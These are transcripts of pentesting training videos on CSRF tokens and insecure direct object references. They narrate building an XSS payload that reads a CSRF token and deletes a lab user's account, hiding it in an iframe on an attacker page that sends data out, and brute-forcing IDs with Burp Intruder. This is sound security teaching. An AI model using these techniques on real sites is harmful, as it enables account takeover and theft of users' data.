the key takeaway is that if you want to do a get, the iframe, the base iframe technique and the image technique works perfectly. But if you want to do a get post, the technique shown here might not be the right way to go ahead. If you find an HTML injection, you can use XML HTTP requests and do the get post. And if you want to use the attacker's website, you could do interesting things and techniques there. But as I said, I have created some challenges which you can look at in the web app challenges section to learn about how you can do it. Well, that's all for this video. Thank you and have a great day ahead. Hello all. Welcome to the web application pen testing series at Pentester Academy. Now in the last video, we looked at CSRF basics. And now what we want to look at is how the industry goes about preventing CSRF attacks using different security methodologies. So the one we are going to take up in this video is CSRF prevention using tokens. Now, before we get into what tokens are and how they work, the core thing we need to understand is what is the problem that we are really trying to solve in the case of CSRF. Now, the problem seems to be that the browser automatically sends the cookie with every request to a web server, right? And the advantage for the attacker is that if he creates a malicious page with a link for a third-party website and the user is logged into the third-party website, then the cookie gets sent automatically and the attacker does not need to know or predict the value of the cookie in advance. Now, unfortunately, in the absence of any other session or operation validation, CSRF would always work perfectly, right? Now, the question arises, the only way the third-party website can actually figure out that a CSRF attack is going on is if it can somehow figure out that the user is logged in and using the website, or is he not, right? In the case he's using the site, of course, he should be allowed, and the case he's not, then his request should be denied. Now, as you can imagine, this is a totally non-trivial problem. Now, one of the attempts at solving this is using tokens. Now, what are tokens? Really long random values which accompany every session or maybe even every request, and ideally should not be repeated for the entire application's lifetime, right? So how do we go about using these totally random tokens? Now, the way developers implement token protection to mitigate CSRF is first to identify all the critical operations in an application. Now, by this we mean the different URLs where GET, POST requests are hitting, API endpoints and whatnot, right? Now, for every such critical operation, the application expects that the request must accompany the token, right? The token must accompany the request, right? Now, given the fact that this token is long, random, unpredictable, and is delivered as part of the HTML, maybe in the case of GET, it could be part of the URL. In the case of POST, it could be delivered as hidden fields in the form. So basically, because this is delivered as part of the HTML, for the logged in user, it is impossible for an attacker to know the value of the tokens in advance. Now keep in mind that if the application changes token pretty much for every request, it's almost an impossible task for the attacker to ever manage to do anything. And this is the rationale behind using tokens to protect against CSRF attacks. Now let me explain this with a quick illustration. So in the first case, we are going to take user interaction without using tokens. So here is a regular web user. Here is an e-commerce website. And typically the e-commerce website is going to send out, let's say, the purchase HTML form to the user's request. The user then fills up the form, hits the submit button, and the browser submits the form data, let's say over a post request, and cookies and other session state, etc., travel to the e-commerce website. Now, of course, if this is truly the logged in user, the cookie and whatever is required in the form matches what the site expects, the transaction goes through. Now, how does an attacker go ahead and exploit this? Well, the attacker is going to lure the victim basically to visit his site. So this is the attacker control site. And in that site, he's going to go ahead and probably have an image link or a script link or an iframe link to a GET request to the website, or maybe a form which is going to make a post request to the e-commerce website. Now, when the user visits the attacker controlled site, his browser automatically ends up sending the post form data along with the cached cookie for the e-commerce website. Now, from the e-commerce website standpoint, it receives all the data it requires, pretty much identical to what the real user had sent, and hence it happily accepts and the operation goes through. Now, let's try and understand what happens when we use tokens. Now, this time around, when the user makes a request to the e-commerce website for viewing a specific URL, let's say which contains a purchase form, the website sends him back the HTML page with the form. However, now in the form, typically as a hidden field, there is the cserf token value created either per session or even per request. Again, the per session versus per request is really the choice of the developer, right? And hence, when you audit web applications, you might see a huge variation of the best practice being used. Anyway, so now the user receives the HTML page with the form and the token as a hidden field, right? So now when the user fills up all his data and submits it, the form data travels along with this unique token with cookie and other session data, right? Now the website receives this, validates the token value, right? The token validation has to happen to what the website expected. And if that validation succeeds, the website happily accepts the request and goes through with whatever operation the user is requesting, which could be purchase of goods, adding a new credit card, or whatever the user might have requested. Now, in the case of the attacker trying to do the same thing, as you can imagine, it is impossible. Here is why. The user is going to visit the attacker's website. Unfortunately, the attacker has no way of figuring out what would be the token which would be served as part of the HTML form to the user. He has no clue, right? Neither can he force the user's browser to go ahead and make a request, get the token and send it to the attacker, right? In the typical case, it just isn't possible. Hence, the attacker will not be able to create an HTML form with the correct token as the hidden field. And hence, when, let's assume, the attacker creates the form, unfortunately doesn't have the token value in there, and the request goes through to the e-commerce site, the e-commerce site now does not find the token in there and pretty much rejects the request, right? So if you notice in this entire schema, the success of the CSRF prevention depends on this token being completely secret and something the attacker can never predict or obtain. So let me show you an example of how this token looks like. I'm going to use the OWASP WebGoat application just like we've used before in previous videos. So this time around, I'm going to go to XSS and then click on CSRF token bypass, right? You can read through the lesson. This is similar to the last two lessons we've done. An extra parameter transfer funds equals main needs to be added. So before that, let's quickly get the URL in question. Hit and enter. Here is the URL. I'm going to copy this one out. And let's actually minimize this a little bit. And now, did I hit the right one? Hold on. Let's clear this real quick and have a look. Seems like an old lesson. Yeah, my mistake. I'm sorry. I need to click on the token bypass, right? This one in here. This is it. So if I hit this URL, at the end I need to append a transfer funds equal main, right? I'm going to do that. I'm going to append that value in there, and now hit and enter. Now if you notice, this time around we again get presented with an electronic transfer. However, if I look at the source code of this form, let's actually do a inspect element. You would actually find a CSRF token value in here. Can you see that? The value of the token seems to be -10621 blah blah blah, right? Now if I refresh the page, which is make a fresh request, do you notice the value of the CSRF token changes in here? There you go, right? Right now it became 758 blah blah blah. If I refresh this again, you notice it changes again and again, right? Pretty much unpredictable if you keep watching this value. Now I'm not going to go into any token analysis, which is, you know, how robust is the token, is there enough entropy, enough randomness. This is similar to analyzing the session state value, which we've taken up in many previous challenges. I'm probably going to give out one or more challenges on CSRF token analysis. So keep watching the web application challenges section, and you're probably going to find one or more of them, which you can play with. Anyway, the point in this case is, now if you were an attacker and you had to go ahead and create a post for this form, you would unfortunately never know the value of the CSRF token which was assigned to the user at that point. And hence, you can never create a custom request through your attacker controlled website. And even if you lure the user to visit your site, you would never have the right token, and hence the website would always deny your request. So this is really how CSRF tokens work. Now, of course, this isn't a foolproof mechanism, right? What could possibly go wrong? Now, as I mentioned earlier, the most important thing is the token value should at no cost and no time be predictable, right? So is the token long enough? Because if it isn't, someone could brute force it. Is it random enough? Because if it isn't, someone could predict the algorithm for how the token was derived. And, you know, really bad development practices include deriving the token from known predictable data, right? Now, apart from the token itself being long, random, and unpredictable, is the token repeated or reused? This is again a really bad idea. Is the token stored securely, right? keep in mind that if the token is part of the URL parameter for a get, then your history in your browser, server logs, and many other places basically might contain the token. Now, apart from this, is the token going to be transmitted over a secure medium? Is it HTTPS? Because if it isn't, then keep in mind that the transit could be something you'd worry about, with the possibility of sniffing and MITM attacks, depending on how your end user plans to connect to your website, right? Is he using a hotel Wi-Fi? Is he using some sort of a public municipal Wi-Fi? Depending on all of that. So these are important. As I mentioned in the challenges section, we will take up some of them. Now, apart from this, as far as CSRF goes, I would highly recommend looking at the OWASP CSRF guides. They are very elaborate, and a lot of stuff we discussed are based on those guides. So have a look, read through them. I'm sure you're going to learn a lot of smaller things given the level of detail to which the authors have gone. Fantastic. So hope this video was enjoyable. And if you did, please recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at CSRF and XSS and see how this can be a very interesting combination. Okay, so in the last video, we've seen how tokens can be used to mitigate CSRF attacks, right? And the logic there was that if a website requires a unique token, which can be, kind of changed per session or per request, then this is something the attacker cannot know a priori, and hence he will not be able to create a request which will contain the right token, and his CSRF attack attempts would completely fail. Now, how does this change if there is an XSS on the website? So here is our setup. We have the victim user and we have a website which he uses. Now, what if the attacker finds a cross-site scripting attack on this website, right? It can be a reflected, a stored XSS, and in this specific example, let's assume it's a reflected XSS. Now, what if the attacker goes ahead and sends the victim a link with the appropriate XSS payload? Now, as soon as the victim opens this up, he visits the website, the XSS payload gets reflected back to him in the HTML served by the website. And after this, the victim's browser is going to happily run the XSS payload. And now the payload picks up the token from the HTML page and then makes a malicious request with the token included. Now, as you can imagine, for the website, it's almost impossible to figure out whether this token was something which was picked up by an XSS payload or something which was sent because of a genuine user interaction. Hence, the website happily accepts the token and the malicious request and completes it, right? So if there is an XSS vulnerability on the site, pretty much CSRF tokens would be rendered completely useless. Let us take up an example. Now, here is my sample application, very simple application. And John has just logged into his account and there is a possibility to delete that account. Right? The account deletion was successful. Now, if we actually look at the source code of the page, and look at this form in here. Now, even though the form seems to be very bare bone and simple, right, it does have a CSRF token in there along with a UID field. Now, both of these need to be sent in order for this to work, and the attacker cannot know either of them a priori, right? And we can see this is a post request going to this script. Now, what we would discover is the parameter URL allows us to inject HTML and basically conduct an XSS attack. Right, this is a given as well. There we go. So using this, now let us bypass the CSRF protection. So to do this, I'm going to have to write an XSS payload. Let's open up Notepad. And let's write an XSS payload for this task. Okay. So basically, our XSS payload is going to make an XML HTTP request. So I'm going to say var request equals new XML HTTP request. The URL to open is request.open. We're going to submit the form. So this is going to be a post method. Here is the URL. Let's make this asynchronous. And let's do a request.send. Now let's actually pick up some of these parameters from in here. So let's go back to the challenge. And I'm going to go ahead and pick up the appropriate URL. So here is the URL. Let's pick that up. Let's go in here. Right. Now let's take in both the parameters. First is UID. So I'm going to do a request.send, and inside this I'm going to say UID equals, right, at this point of course we still probably do not know what the UID is. Keep that in mind. So I'm going to say plus UID plus, and then after that ampersand CSRF underscore token is equal to, again I don't know what the token is, I'll have to figure it out dynamically, right? So let's do this. Let's go back in here. So this is basically going to be the fields from this specific form, right? So let's pick up the first form elements value and actually make this a bit more smaller. So let's type in here that basically UID, just keep it as var UID equals document dot forms 0. There's only one form on this page. Dot elements 0 dot value, right? This would be whatever is the UID value, excuse me, which would be picked up. Similarly, var token is equal to document.forms 0 dot elements 1 dot value, right? So this way now we picked up both the UID as well as the token. We've mentioned those in here. Let me just verify this. And then after that, we need to ensure the content type is set, because this is going to be a post form. So request dot set request header. Now, if all of this is alien to you, you should look at the JavaScript for Pentesters course. content type, and then we have x www form URL encoded. Get some spacing in between so that we can see everything a little bit more clearly, right? Okay, so I pick up the UID, I pick up the token, I create a new XML HTTP request, I make a post request, set request header to content type x www form URL encoded, and then send in the parameters which I picked up from above, UID and cserf underscore token. Looks about okay. So let's pick this up, copy it out, go to our encoder, encode it, copy it out. Let's also have our network monitoring enabled so we can actually see the request go through. I'm going to paste this here in the URL parameter, right? And there you go. If you notice, the first was of course the GET request for the page, and now our post has gone through, and of course this site currently has no cookies set up, so you won't find any. Here are the parameters. UID was picked up perfectly, the cserf token was picked up perfectly, and the response basically says invalid session. Okay, so we actually get an invalid session. So the problem seems to be that I forgot to do the prefix application x www form encoded, URL encoded. So that basically caused the receiving application probably not to use the post data at all. Right, let's go back in here. Let's just quickly encode this out, copy it out. Let's go back in here. Let's clear all the requests. Delete this. Let's paste this again. Okay, the post here went through. There you go. Account deletion for John successful. And if you notice, we basically sent in the right params, and the response is perfectly what we expect, right? We can go ahead and even alert the response, and we can do this, if you recall, by doing the request on ready state change, and this would basically be now this is only required if you'd like to do any further processing with the response, right? In this case, we can just do a very simple alert. So I'm going to do a request on ready state equals 4, and then request status equals 200, right? And if this is the case, let's just go ahead and do an alert, and I'm going to do a request dot response text. That's about it. Let's copy this out, go back in here, paste it, encode it, copy it back again, paste the payload. Before I do that, let me clear the screen. There you go. Now the response has been alerted to us, right? Now, as you clearly saw that this brilliant piece of script in here automatically picked up the UID, the token, constructed the request, and because an XSS were discovered on the site where the CSRF tokens were being used, we were able to subvert the protection. Now keep in mind that in most cases, you only need one page on the website which is vulnerable to XSS. And then you could pretty much access any page, fetch tokens, and even walk through a stateful application page by page, all using XML HTTP requests. Now, if you're wondering how that can be done, please have a look at the JavaScript for Pen Testers course. I've gone in very great detail to show you how those things can be done. Okay, fantastic. So basically what we found is with XSS, CSRF tokens are pretty much useless and defenseless against the attacker. Hopefully you enjoyed this video, and if you have, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pen Testing course at Pentester Academy. Now, in the last video, we looked at CSRF token bypass with XSS, but there were a couple of things probably which we wouldn't be comfortable with, right, as a pen tester. Now, what we had done was we'd sent a link to the vulnerable website to the victim, and the victim then clicked on the link and loaded the page up, and the XSS payload ran and things happened, right? Now, in the real world, probably the victim might find it very suspicious to receive a link for, let's say, bank.com from someone unknown to him or someone on a social media website, right? This is where to probably think that the victim might load up the site for us is something which is probably an oversimplification. Ideally, what we would want is that the victim lands on the attacker controlled website, and this could pretty much be any site on the internet, right, which the attacker controls entirely or has found injection vulnerabilities in. And at that point, the attacker should be able to go ahead and conduct the same XSS based CSRF token stealing and do whatever he did in the last video. So how do we do this? So in order to accomplish this, we are going to use something called iframes. Very simply put, iframe is an HTML tag which allows us to embed and display a web page within a web page. Now, this embedded page can belong to the same domain or can belong to pretty much any other domain or site in the World Wide Web. Now, keep in mind that all the origin policies and everything apply within the frame, which is the attacker, even if he's hosting the parent site, will not be able to read data from within the iframe, and hence there is no interaction possible. So what can the attacker do? Well, he can still run his little XSS payloads if he can pass them properly, and then he can use those payloads to post data to his own website, as we shall see in the demo. And as I mentioned, what he cannot do is read data directly from the embedded frame. But the good news is, pretty much in almost all cases, it isn't required to do that as far as CSRF evasion with XSS is concerned. So let's go ahead and do this demo together. Now I'm going to be using the same example as in the last video. And I'm going to use the base payload which we had created as the starting point. So I'm going to go ahead, create a quick web server. And this web server is going to have its root directory as this directory, where I'm going to create my HTML files. I'm going to start my Python web server on port 80. I can go in here and there it is. This is running, right? So let's create a very simple HTML file in here. I'm going to call it csrf xss iframe. Let's make this an HTML file. Really just a quick POC of what we'd like to do, right? Now inside this, let's make this an appealing website. Welcome to an interesting website on the World Wide Web. Let's save this, go back in here, refresh the page, open this up in a new tab. And we see that this is an attacker controlled website, right? And the victim can land on this site by clicking on a social media link or something else. Now what we need to do is we need to go ahead and conduct the attack on this website through this page. So let's go ahead and do that. Let's create an iframe in here. I'm going to say iframe source equals, which is what we're going to paste. And let me go ahead and put this link in here. I still have to put in my XSS payload. So I'm going to go back here and take the XSS payload which we created in the last demo. Just encode it. Paste it in there. Save the file. Go back here. Let's check our network monitor just so we know what's happening. Then hit an enter. And there you go. We got the alert as expected. As you can see, that account deletion for John successful. And we see the post request, which we so much so expect, right? Fantastic. Now at this point, if you note, the third-party website, the victim site, has actually opened up inside an iframe in here. Now this is something which is not desirable at all, right? And this is where what we're going to do is make this a hidden iframe. So let me show you how to do that. It's actually more simple than you realize. All we have to do is apply a style and basically go ahead and say display none. Can save this. Did I mess up the payload in any way? I kind of see that there was an enter or something which happened in there. Let me just copy the payload back again. Don't want my payload to break. That wouldn't be nice. Now when I go back and enter, there you go. I still get the JavaScript alert, But if you notice on the page, there is absolutely no visible notification of anything happening, right? No notification at all apart from this JavaScript. Fantastic. Now, what we're going to do is, this JavaScript isn't of much use to us, this little alert. So I'm going to remove that, and rather I'm going to now post to the attacker's server, right? Now you can use the image technique as I've shown you in the JavaScript for pen testers course. Alternately, you can actually do this using a new XML HTTP request. So I'm going to say request to dot open. It's going to be a get request, and this is going to post the response to the attacker's server. Just an arbitrary URL which I just framed. So make it synchronous. Let's do a request to dot send. There we go. Now keep in mind, we can easily post to the attacker's server, and if you're wondering now about the same origin, the cross origin policies and all of that, when we come to cores, what you will realize is basically the website to which you're posting, right, the get or any of the other method, that's the one which gets to decide whether you're allowed to do this or not. And for simple methods like get, it anyway goes through, and because the attacker controls that site, there isn't something we need to worry about here at all. Okay, let me just quickly check the syntax, make sure there aren't any syntactual errors. This looks okay to me. I'm going to copy this out, go back to my encoder, paste it, encode it, copy it out, go back in here, delete the existing payload. Paste this new payload in there, save it. Now this is our attacker server, right? So we should see an interesting request come in here. Let's go back. Let's keep our network monitor on. Right? So if you notice, post went through, we get the response, and then now we are basically posting to the attacker server. Of course, there is no such file in there at this point, but the attacker could write a script to receive whatever data he wants exfiltrated through the application. Now in this case, the data we exfiltrated was the response to the delete account call, which was account deletion for John successful. Fantastic, right? So you can clearly see how we've kind of optimized the problem, and now the user is only visiting a third-party site controlled by the attacker directly, or where again he's found an injection-based vulnerability. Now, once the victim is there, an iframe can be used which can be hidden from the victim's view, through which the XSS attack can be exploited. The CSRF token can be picked up, and once the CSRF token is picked up, further requests can be made in the application, like in this case, deleting John's account, right? Fantastic. So hopefully you had fun with this video, and if you're enjoying your time at Pentester Academy, please recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome
to the Web Application Pen Testing series at Pentester Academy. In this video, we will look at insecure direct object reference vulnerabilities in web apps. So what is an insecure direct object reference vulnerability? Well, very simply put, a lot of times we access different files, directories, and data in a database. Now, if the developer has not put in authorization checks every single time an object is referenced, then this could go ahead and lead to authorization bypass vulnerabilities. So, the question to ask yourself when auditing an app is, given the object we are trying to refer to, could there be a possibility that the developer might not check if the current user is authorized to access that object? Now, as I mentioned, these could be files, directories, data in a database, and on multi-user systems, pretty much any data or any other object which basically should only be accessible to a specific user or a group of users. Now, insecure direct object reference is part of the OWASP top 10 list of vulnerabilities, and you can check out the website and read more about it. Now, in this video, I'm now going to go ahead and show you a very simple demonstration of insecure direct object references. So I'm going to go ahead to my Kali machine on which I have created a very simple PHP script, and I'm going to share this PHP script with you as well. Again, really simple script, and I'll run you through it. So now I'm actually in a portal where I'm welcomed as John, and it tells me that the account balance for John is 9999, right? And refresh the page, shows me the same thing. Now, if you look at the URL, you'll actually find that there is a session ID which equals 3452345. Now, keep in mind, even though the variable may be named like that, internally it could have been used for various other purposes as well. So what would happen if we try and meddle with this parameter? So if I remove the 5, hit an enter, I actually find that I'm still logged in as John. Interesting. Which means internally this could have had a completely different interpretation apart from maybe just maintaining state that I'm John. However, the account balance which is shown is nil, right? Nothing is shown. So let's say instead of 5 which was there, I can, this is the original one, so actually make it 6. Again, I seem to get nothing, and one could actually try various different possibilities. Now let's say you do that, and I'll show you how to do it in an automated way with Burp later. Then let's say we arrive at a value 3452995, hit an enter, and if you notice, even though it actually still welcomes me as John, it says account balance for Jake seems to be 20 million. So looks like Jake is someone on the system and definitely seems to have a couple of orders of magnitude more money than John. Now, this is an example of an insecure direct object reference. Just by tampering a parameter, which internally might even mean the user ID or some other unique identifier, we were actually able to access a database value or a database object which actually belonged to a different user, Jake, rather than John. Now, such examples are very, very common, and typically in a multi-user system, if a developer forgets to go ahead and add the right authorization checks, then this is something which can be very, very prevalent. Now the PHP script which I have actually written is a dummy script, and all it does is it takes the session ID and of course welcomes you as John, and at any given point, if the session ID is this, it prints John's balance, and if this is the session ID, it actually prints Jake's balance, right? In a real world application, this value would have been taken and maybe passed along as part of a database query, and then the result would be parsed and shown to the user. So by using this script, once again, from an end user perspective or from a pen tester's or a hacker's perspective, we are able to simulate an insecure direct object reference. Now, of course, the question really arises as to, in a real world scenario, how would we go ahead and try and iterate through a couple of these 100 values to see if we can get any meaningful information. Now to do that, of course, we will have to use an automation framework, and we'll see how we can use Burp Suite in order to do some of this automated analysis for us in the next video using the same script. So that's all I have in mind for this video. If you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Hello all, welcome to the web application pen testing series at Pentester Academy. Now in the last video, we saw a very simple introduction to insecure direct object reference. In this video, we'll look at how to automate the previous example using Burp. So let's jump right in. I'm going to pick up the last example, and if you recall that changing this parameter to 995 allowed us to actually access a database entry meant for Jake and not John. So let's go back in here. Now, as you can imagine, to iterate from 345 to let's say 995 is going to take us a good amount of time. And of course, we really do not know when we may find a direct object reference by changing this parameter value. And hence, you would have to iterate through different possibilities. So to do this, we are going to use Burp. Now let's go ahead and launch Burp. Under top 10 security tools, Burp Suite. Now we are using a free edition, keep that in mind. So there are some limitations. In some versions of Burp, the throttling is more than others. So let's actually go ahead, set this up. I'm going to go to proxy and go to options, and we can actually see that the Burp proxy is already running on 127.0.0.1.80.80. Okay, and intercept is on as well. So let me actually go to the browser and change the settings so that we can use the proxy. So I'm going to do manual proxy setting, localhost 8080, use this for all protocols. And remember to remove no proxy for localhost and 127.0.0.1, right? Or else this setting is of no use. Now, when I go ahead and hit an enter, I can clearly see Burp light up. And Burp has intercepted the request. Now, we would ideally want to be able to control and change this parameter and send automated requests so that this parameter value is incremented, and then we should be able to observe the response sent back from the web server. So to do that, I'm going to click on action and then say send to intruder. Now the moment we do that, we'll actually see the intruder tab light up. So it's actually remove intercepts and go back in here to intruder. Now if you notice, we see a target localhost 80, and if I click on positions, you'll actually find that Burp Suite, because it has probably only detected one single parameter, has already marked that parameter for us and says that, hey, this is something which we should work on as the payload. Fantastic. Now I can go to the payloads tab, and it says payload set 1. Of course, there's only one payload we'd like to set here. And then the type. Now the type, of course, in our case is just a number. Now the moment we select number, we are requested to go ahead and add the actual values for which the payload would iterate. Now in this case, we are selecting sequential, and the start value, so actually pick this up from over here. The start value is this, and the end value can be 999. Now once we've set this, of course the step is going to be 1, and then we can go back here, click on intruder and click start attack. Now this actually tells us that attacks are time throttled, which is of course a limitation, but hey, we are learning this through the free version of Burp, and one should always go ahead and purchase the pro version if you're using this actively for all your assignments. Now let's go ahead and look at this. So as you can clearly see, setting this value, so actually expand this, setting this value to this gives us the very first HTML, which is what we saw. Now let's actually reverse this. The length is 315, everything else is 317. 307, I'm sorry, and we can clearly see that we have not found much yet, right? Everything is just saying 307, and if we select any of these, we'll actually get account balance for $, which is basically nothing. Of course, in this case, because we are using the free version, it's a bit slow and we have to iterate through many possibilities. So I'm actually going to pause the attack, close this. Now that you get an idea, go back to payloads, and I'm going to make this range a little bit more tolerable, right? Because ideally you'd like to finish this. What is more important is to be able to see the entire demo. So I'm actually going to go ahead and do a 980 to 999. It looks reasonable. Start the attack again. So 315, 307, everything is 307. And select one of these payloads and click on response and then render to see what we can find. And if you notice, as far as the length is concerned, if you just play with the length field, you'll actually find that at 995 the length is 320, and this gives us account balance for Jake is 2 million or 20 million or 200 million, right? Whatever that number is. And this is how now Burp has allowed us to do this in an automated fashion, where once we identify any parameter which we suspect could actually be used for insecure direct object reference, then we can use it along with Burp with this kind of an automated run. Fantastic. So that's all I had in mind for this video. Try this sample out, and if you're enjoying your time at Pen Tester Academy, please recommend us to your friends and colleagues in the InfoSec community. Thank you.